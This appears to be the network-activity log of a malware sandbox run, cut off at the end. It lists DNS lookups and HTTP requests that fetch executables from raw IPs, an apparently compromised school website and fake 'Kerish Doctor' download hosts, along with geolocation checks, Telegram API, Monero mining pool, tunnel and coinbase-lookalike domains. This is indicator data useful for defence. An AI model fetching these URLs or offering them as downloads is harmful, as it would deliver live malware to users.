168.67.125.45.in-addr.arpa

Request

168.67.125.45.in-addr.arpa

IN PTR

Response

168.67.125.45.in-addr.arpa

IN PTR

slot1ge-recom
DNS

49.66.101.151.in-addr.arpa

Request

49.66.101.151.in-addr.arpa

IN PTR

Response
DNS

49.66.101.151.in-addr.arpa

Request

49.66.101.151.in-addr.arpa

IN PTR

Response
DNS

moonloaderupdate.ru

Request

moonloaderupdate.ru

IN A

Response

moonloaderupdate.ru

IN A

37.140.192.16
DNS

moonloaderupdate.ru

Request

moonloaderupdate.ru

IN A

Response

moonloaderupdate.ru

IN A

37.140.192.16
DNS

run-motherboard.gl.at.ply.gg

Request

run-motherboard.gl.at.ply.gg

IN A

Response

run-motherboard.gl.at.ply.gg

IN A

147.185.221.17
DNS

run-motherboard.gl.at.ply.gg

Request

run-motherboard.gl.at.ply.gg

IN A

Response

run-motherboard.gl.at.ply.gg

IN A

147.185.221.17
GET

http://github.com/TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe

Request

GET /TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe
GET

http://147.124.216.113/albt.exe

Request

GET /albt.exe HTTP/1.1
Host: 147.124.216.113
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Mon, 13 Jan 2025 01:10:58 GMT
Accept-Ranges: bytes
ETag: "9ca0aa05865db1:0"
Server: Microsoft-IIS/8.5
Date: Mon, 13 Jan 2025 18:07:19 GMT
Content-Length: 1443328
DNS

113.216.124.147.in-addr.arpa

Request

113.216.124.147.in-addr.arpa

IN PTR

Response
DNS

113.216.124.147.in-addr.arpa

Request

113.216.124.147.in-addr.arpa

IN PTR

Response
DNS

www.kasihcommunityschool.sch.id

Request

www.kasihcommunityschool.sch.id

IN A

Response

www.kasihcommunityschool.sch.id

IN CNAME

kasihcommunityschool.sch.id

kasihcommunityschool.sch.id

IN A

66.63.187.250
DNS

webmail.kasihcommunityschool.sch.id

Request

webmail.kasihcommunityschool.sch.id

IN A

Response

webmail.kasihcommunityschool.sch.id

IN A

66.63.187.250
DNS

10.14.140.82.in-addr.arpa

Request

10.14.140.82.in-addr.arpa

IN PTR

Response
DNS

www.google.com

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

172.67.198.113

pastesnap.com

IN A

104.21.60.172
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

104.21.60.172

pastesnap.com

IN A

172.67.198.113
GET

http://www.kasihcommunityschool.sch.id/mk/drop2.exe

Request

GET /mk/drop2.exe HTTP/1.1
Host: www.kasihcommunityschool.sch.id
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:07:22 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 11 Jan 2025 15:37:58 GMT
ETag: "83800-62b6ffee44180"
Accept-Ranges: bytes
Content-Length: 538624
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://webmail.kasihcommunityschool.sch.id/mk/drop1.exe

Request

GET /mk/drop1.exe HTTP/1.1
Host: webmail.kasihcommunityschool.sch.id
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:07:27 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 28 Dec 2024 12:51:27 GMT
ETag: "13bc00-62a54099d2418"
Accept-Ranges: bytes
Content-Length: 1293312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://82.140.14.10:8080/01.exe

Request

GET /01.exe HTTP/1.1
Host: 82.140.14.10:8080
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 192585
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.971941032679752; path=/;
Last-Modified: Thu, 20 Jul 2017 08:58:17 GMT
Content-Disposition: attachment; filename="01.exe";
GET

http://82.140.14.10:8080/wudi.exe

Request

GET /wudi.exe HTTP/1.1
Host: 82.140.14.10:8080

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 1625790
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.867473079357296; path=/;
Last-Modified: Thu, 20 Jul 2017 00:07:14 GMT
Content-Disposition: attachment; filename="wudi.exe";
GET

http://82.140.14.10:8080/00.exe

Request

GET /00.exe HTTP/1.1
Host: 82.140.14.10:8080

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 432640
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.525993116898462; path=/;
Last-Modified: Thu, 20 Jul 2017 08:58:06 GMT
Content-Disposition: attachment; filename="00.exe";
GET

http://82.140.14.10:8080/64.exe

Request

GET /64.exe HTTP/1.1
Host: 82.140.14.10:8080

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 1425408
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.962394278496504; path=/;
Last-Modified: Thu, 20 Jul 2017 08:57:59 GMT
Content-Disposition: attachment; filename="64.exe";
DNS

amazonenviro.com

Request

amazonenviro.com

IN A

Response

amazonenviro.com

IN A

166.62.27.188
DNS

113.198.67.172.in-addr.arpa

Request

113.198.67.172.in-addr.arpa

IN PTR

Response
DNS

113.198.67.172.in-addr.arpa

Request

113.198.67.172.in-addr.arpa

IN PTR

Response
DNS

188.27.62.166.in-addr.arpa

Request

188.27.62.166.in-addr.arpa

IN PTR

Response

188.27.62.166.in-addr.arpa

IN PTR

1882762166hostsecureservernet
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

172.67.198.113

pastesnap.com

IN A

104.21.60.172
DNS

www.fexe-tmp-1.top

Request

www.fexe-tmp-1.top

IN A

Response

www.fexe-tmp-1.top

IN A

185.221.219.112
DNS

55.65.240.43.in-addr.arpa

Request

55.65.240.43.in-addr.arpa

IN PTR

Response
DNS

55.65.240.43.in-addr.arpa

Request

55.65.240.43.in-addr.arpa

IN PTR

Response
GET

http://82.140.14.10:8080/02.exe

Request

GET /02.exe HTTP/1.1
Host: 82.140.14.10:8080
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 58368
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.310914721572772; path=/;
Last-Modified: Thu, 20 Jul 2017 08:58:00 GMT
Content-Disposition: attachment; filename="02.exe";
GET

http://82.140.14.10:8080/32.exe

Request

GET /32.exe HTTP/1.1
Host: 82.140.14.10:8080

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 53248
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.373638940509409; path=/;
Last-Modified: Tue, 18 Apr 2017 19:57:00 GMT
Content-Disposition: attachment; filename="32.exe";
GET

http://43.240.65.55:81/IMG001.exe

Request

GET /IMG001.exe HTTP/1.1
Host: 43.240.65.55:81
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Sat, 23 Dec 2023 11:04:49 GMT
Accept-Ranges: bytes
ETag: "d92f18d98f35da1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 13 Jan 2025 18:07:47 GMT
Content-Length: 3553626
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_2022.exe

Request

GET /get/415oaux32/Kerish_Doctor_2022.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:07:46 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows.exe

Request

GET /get/415oaux32/Kerish_Doctor_Windows.exe HTTP/1.1
Host: www.fexe-tmp-1.top

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:09:20 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
DNS

112.219.221.185.in-addr.arpa

Request

112.219.221.185.in-addr.arpa

IN PTR

Response

112.219.221.185.in-addr.arpa

IN PTR

112-219-221-185clientsgthostcom
DNS

112.219.221.185.in-addr.arpa

Request

112.219.221.185.in-addr.arpa

IN PTR

Response

112.219.221.185.in-addr.arpa

IN PTR

112-219-221-185clientsgthostcom
DNS

other-little.gl.at.ply.gg

Request

other-little.gl.at.ply.gg

IN A

Response

other-little.gl.at.ply.gg

IN A

147.185.221.25
DNS

urlhaus.abuse.ch

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.2.49
DNS

wiso-fs-1.top

Request

wiso-fs-1.top

IN A

Response

wiso-fs-1.top

IN A

185.221.219.112
DNS

wiso-fs-1.top

Request

wiso-fs-1.top

IN A

Response

wiso-fs-1.top

IN A

185.221.219.112
GET

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2023.exe

Request

GET /get/415oaux32/Kerish_Doctor_2023.exe HTTP/1.1
Host: wiso-fs-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:08:21 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

wzt5xcg.localto.net

Request

wzt5xcg.localto.net

IN A

Response

wzt5xcg.localto.net

IN A

116.203.56.216
DNS

wt-tmp-1.top

Request

wt-tmp-1.top

IN A

Response

wt-tmp-1.top

IN A

185.221.219.112
DNS

wt-tmp-1.top

Request

wt-tmp-1.top

IN A

Response

wt-tmp-1.top

IN A

185.221.219.112
GET

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor.exe

Request

GET /get/415oaux32/Kerish_Doctor.exe HTTP/1.1
Host: wt-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:08:27 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

checkip.dyndns.org

Request

checkip.dyndns.org

IN A

Response

checkip.dyndns.org

IN CNAME

checkip.dyndns.com

checkip.dyndns.com

IN A

193.122.6.168

checkip.dyndns.com

IN A

132.226.247.73

checkip.dyndns.com

IN A

158.101.44.242

checkip.dyndns.com

IN A

132.226.8.169

checkip.dyndns.com

IN A

193.122.130.0
DNS

reallyfreegeoip.org

Request

reallyfreegeoip.org

IN A

Response

reallyfreegeoip.org

IN A

104.21.64.1

reallyfreegeoip.org

IN A

104.21.48.1

reallyfreegeoip.org

IN A

104.21.80.1

reallyfreegeoip.org

IN A

104.21.16.1

reallyfreegeoip.org

IN A

104.21.96.1

reallyfreegeoip.org

IN A

104.21.112.1

reallyfreegeoip.org

IN A

104.21.32.1
DNS

reallyfreegeoip.org

Request

reallyfreegeoip.org

IN A

Response

reallyfreegeoip.org

IN A

104.21.32.1

reallyfreegeoip.org

IN A

104.21.48.1

reallyfreegeoip.org

IN A

104.21.64.1

reallyfreegeoip.org

IN A

104.21.96.1

reallyfreegeoip.org

IN A

104.21.80.1

reallyfreegeoip.org

IN A

104.21.112.1

reallyfreegeoip.org

IN A

104.21.16.1
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:29 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:29 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:30 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:30 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:30 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:30 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:31 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:31 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:31 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:08:31 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
DNS

168.6.122.193.in-addr.arpa

Request

168.6.122.193.in-addr.arpa

IN PTR

Response
DNS

168.6.122.193.in-addr.arpa

Request

168.6.122.193.in-addr.arpa

IN PTR

Response
DNS

1.64.21.104.in-addr.arpa

Request

1.64.21.104.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
DNS

api.telegram.org

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
DNS

220.167.154.149.in-addr.arpa

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

mail.irco.com.sa

Request

mail.irco.com.sa

IN A

Response

mail.irco.com.sa

IN A

46.151.208.21
DNS

mail.irco.com.sa

Request

mail.irco.com.sa

IN A

Response

mail.irco.com.sa

IN A

46.151.208.21
DNS

21.208.151.46.in-addr.arpa

Request

21.208.151.46.in-addr.arpa

IN PTR

Response

21.208.151.46.in-addr.arpa

IN PTR

host ibtikaratnet
DNS

21.208.151.46.in-addr.arpa

Request

21.208.151.46.in-addr.arpa

IN PTR

Response

21.208.151.46.in-addr.arpa

IN PTR

host ibtikaratnet
GET

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2021.exe

Request

GET /get/415oaux32/Kerish_Doctor_2021.exe HTTP/1.1
Host: wiso-fs-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:08:40 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

ipinfo.io

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.59.81
DNS

ipinfo.io

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.59.81
GET

http://ipinfo.io/country

Request

GET /country HTTP/1.1
Host: ipinfo.io
User-Agent: curl/7.79.1
Accept: */*

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
Content-Length: 3
content-type: text/html; charset=utf-8
date: Mon, 13 Jan 2025 18:08:42 GMT
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
DNS

81.59.117.34.in-addr.arpa

Request

81.59.117.34.in-addr.arpa

IN PTR

Response

81.59.117.34.in-addr.arpa

IN PTR

815911734bcgoogleusercontentcom
DNS

81.59.117.34.in-addr.arpa

Request

81.59.117.34.in-addr.arpa

IN PTR

Response

81.59.117.34.in-addr.arpa

IN PTR

815911734bcgoogleusercontentcom
DNS

pool.supportxmr.com

Request

pool.supportxmr.com

IN A

Response

pool.supportxmr.com

IN CNAME

pool-fr.supportxmr.com

pool-fr.supportxmr.com

IN A

141.94.96.71

pool-fr.supportxmr.com

IN A

141.94.96.195

pool-fr.supportxmr.com

IN A

141.94.96.144
DNS

pool.supportxmr.com

Request

pool.supportxmr.com

IN A

Response

pool.supportxmr.com

IN CNAME

pool-fr.supportxmr.com

pool-fr.supportxmr.com

IN A

141.94.96.195

pool-fr.supportxmr.com

IN A

141.94.96.71

pool-fr.supportxmr.com

IN A

141.94.96.144
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.202.226.61
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.202.226.61
DNS

144.96.94.141.in-addr.arpa

Request

144.96.94.141.in-addr.arpa

IN PTR

Response

144.96.94.141.in-addr.arpa

IN PTR

ns31430818ip-141-94-96eu
DNS

71.96.94.141.in-addr.arpa

Request

71.96.94.141.in-addr.arpa

IN PTR

Response

71.96.94.141.in-addr.arpa

IN PTR

ns31430745ip-141-94-96eu
DNS

2.1.34.161.in-addr.arpa

Request

2.1.34.161.in-addr.arpa

IN PTR

Response

2.1.34.161.in-addr.arpa

IN PTR

dc84etiusjp
DNS

2.1.34.161.in-addr.arpa

Request

2.1.34.161.in-addr.arpa

IN PTR

Response

2.1.34.161.in-addr.arpa

IN PTR

dc84etiusjp
GET

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.2.exe

Request

GET /get/415oaux32/Kerish_Doctor_Windows_8.2.exe HTTP/1.1
Host: wt-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:08:51 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_XP.exe

Request

GET /get/415oaux32/Kerish_Doctor_Windows_XP.exe HTTP/1.1
Host: wt-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:09:17 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.exe

Request

GET /get/415oaux32/Kerish_Doctor_Windows_8.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:09:26 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2017.exe

Request

GET /get/415oaux32/Kerish_Doctor_2017.exe HTTP/1.1
Host: wiso-fs-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:09:41 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

103.24.72.80.in-addr.arpa

Request

103.24.72.80.in-addr.arpa

IN PTR

Response
DNS

103.24.72.80.in-addr.arpa

Request

103.24.72.80.in-addr.arpa

IN PTR

Response
DNS

3.241.36.216.in-addr.arpa

Request

3.241.36.216.in-addr.arpa

IN PTR

Response
DNS

3.241.36.216.in-addr.arpa

Request

3.241.36.216.in-addr.arpa

IN PTR

Response
DNS

3.205.153.131.in-addr.arpa

Request

3.205.153.131.in-addr.arpa

IN PTR

Response

3.205.153.131.in-addr.arpa

IN PTR

mx1mailertenderstartscom
DNS

3.205.153.131.in-addr.arpa

Request

3.205.153.131.in-addr.arpa

IN PTR

Response

3.205.153.131.in-addr.arpa

IN PTR

mx1mailertenderstartscom
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.202.226.61
DNS

stafftest.ru

Request

stafftest.ru

IN A

Response

stafftest.ru

IN A

18.141.10.107
DNS

stafftest.ru

Request

stafftest.ru

IN A

Response

stafftest.ru

IN A

18.141.10.107
GET

http://stafftest.ru/test.html

Request

GET /test.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: stafftest.ru
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:10:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bfccaa67a00cab8a210a9770b73f2fed|181.215.176.83|1736791801|1736791801|0|1|0; path=/; domain=.stafftest.ru; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_Vista.exe

Request

GET /get/415oaux32/Kerish_Doctor_Windows_Vista.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:10:01 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

107.10.141.18.in-addr.arpa

Request

107.10.141.18.in-addr.arpa

IN PTR

Response

107.10.141.18.in-addr.arpa

IN PTR

ec2-18-141-10-107ap-southeast-1compute amazonawscom
DNS

107.10.141.18.in-addr.arpa

Request

107.10.141.18.in-addr.arpa

IN PTR

Response

107.10.141.18.in-addr.arpa

IN PTR

ec2-18-141-10-107ap-southeast-1compute amazonawscom
GET

http://stafftest.ru/stat.html

Request

GET /stat.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: stafftest.ru
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: btst=bfccaa67a00cab8a210a9770b73f2fed|181.215.176.83|1736791801|1736791801|0|1|0; snkz=181.215.176.83

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:10:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bfccaa67a00cab8a210a9770b73f2fed|181.215.176.83|1736791802|1736791801|0|2|0; path=/; domain=.stafftest.ru; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
GET

http://stafftest.ru/text.html

Request

GET /text.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: stafftest.ru
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: btst=bfccaa67a00cab8a210a9770b73f2fed|181.215.176.83|1736791802|1736791801|0|2|0; snkz=181.215.176.83
DNS

gitlab.com

Request

gitlab.com

IN A

Response

gitlab.com

IN A

172.65.251.78
DNS

gitlab.com

Request

gitlab.com

IN A

Response

gitlab.com

IN A

172.65.251.78
DNS

wzt5xcg.localto.net

Request

wzt5xcg.localto.net

IN A

Response

wzt5xcg.localto.net

IN A

116.203.56.216
DNS

wzt5xcg.localto.net

Request

wzt5xcg.localto.net

IN A

Response

wzt5xcg.localto.net

IN A

116.203.56.216
DNS

api.accueil-coinbase.com

Request

api.accueil-coinbase.com

IN A

Response

api.accueil-coinbase.com

IN A

91.202.233.151
DNS

api.accueil-coinbase.com

Request

api.accueil-coinbase.com

IN A

Response

api.accueil-coinbase.com

IN A

91.202.233.151
DNS

78.251.65.172.in-addr.arpa

Request

78.251.65.172.in-addr.arpa

IN PTR

Response
DNS

78.251.65.172.in-addr.arpa

Request

78.251.65.172.in-addr.arpa

IN PTR

Response
DNS

github.com

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

tr3.localto.net

Request

tr3.localto.net

IN A

Response

tr3.localto.net

IN A

185.141.35.21
DNS

tr3.localto.net

Request

tr3.localto.net

IN A

Response

tr3.localto.net

IN A

185.141.35.21
DNS

cranky-nash.91-202-233-151.plesk.page

Request

cranky-nash.91-202-233-151.plesk.page

IN A

Response

cranky-nash.91-202-233-151.plesk.page

IN A

91.202.233.151
DNS

cranky-nash.91-202-233-151.plesk.page

Request

cranky-nash.91-202-233-151.plesk.page

IN A

Response

cranky-nash.91-202-233-151.plesk.page

IN A

91.202.233.151
DNS

urlhaus.abuse.ch

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.2.49
DNS

urlhaus.abuse.ch

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.2.49
DNS

VIPEEK1990-25013.portmap.host

Request

VIPEEK1990-25013.portmap.host

IN A

Response
DNS

config.edge.skype.com

Request

config.edge.skype.com

IN A

Response

config.edge.skype.com

IN CNAME

config.edge.skype.com.trafficmanager.net

config.edge.skype.com.trafficmanager.net

IN CNAME

l-0007.config.skype.com

l-0007.config.skype.com

IN CNAME

config-edge-skype.l-0007.l-msedge.net

config-edge-skype.l-0007.l-msedge.net

IN CNAME

l-0007.l-msedge.net

l-0007.l-msedge.net

IN A

13.107.42.16
DNS

test.aionclassic.pro

Request

test.aionclassic.pro

IN A

Response

test.aionclassic.pro

IN A

80.72.24.103
DNS

xanaxspoofer.com

Request

xanaxspoofer.com

IN A

Response

xanaxspoofer.com

IN A

172.67.71.136

xanaxspoofer.com

IN A

104.26.14.227

xanaxspoofer.com

IN A

104.26.15.227
DNS

xanaxspoofer.com

Request

xanaxspoofer.com

IN A

Response

xanaxspoofer.com

IN A

104.26.14.227

xanaxspoofer.com

